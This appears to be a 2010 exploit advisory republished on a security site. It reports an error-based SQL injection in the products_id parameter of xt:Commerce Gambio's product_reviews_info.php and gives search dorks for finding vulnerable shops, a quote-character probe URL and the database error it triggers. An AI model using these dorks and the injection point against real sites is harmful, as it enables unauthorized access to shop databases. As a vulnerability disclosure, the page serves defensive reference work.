xt:Commerce Gambio 2008 - 2010 SQL Injection

2011.10.15
Credit: secret
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

________ _____________ / /_ / ___/ _ \/ ___/ ___/ _ \/ __/ (__ ) __/ /__/ / / __/ /_ /____/\___/\___/_/ \___/\__/ # Exploit Title: xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection "reviews.php" # Date: 2010-09-18 # Author: secret # Contact : secret_hf@hotmail.com / ICQ : 17-33-77 # Site : swissfaking.net/board # Software Link: http://www.gambio.de/ # Version: 2006 - 2008 - 2010 - all versions # Tested on: XP / Linux # Fixed? : NOT FIXED # Dorks : Gambio inurl:"reviews.php" / Gambio inurl:"product_reviews.php?products_id=" etc... ############################################################################################## [ERROR BASED SQL INJECTION] http://www.xxxxx.com/product_reviews_info.php?products_id=x[SQL INJECTION] e.g. http://server/product_reviews_info.php?products_id=4[ERROR BASED SQL INECTION] e.g. http://server/product_reviews_info.php?products_id=4' -> xtc_db_error ("select manufacturers_id from products where products_id = 4/'", "1064 ############################################################################################## [THANKS TO] ALLAH - ???? ?? ??? ?? ??? To all my brothers & sisters in IRAN - god bless you - support the GREEN REVOLUTION

References:

http://xforce.iss.net/xforce/xfdb/61899
http://www.exploit-db.com/exploits/15039
http://packetstormsecurity.org/1009-exploits/xtcommercegambio-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top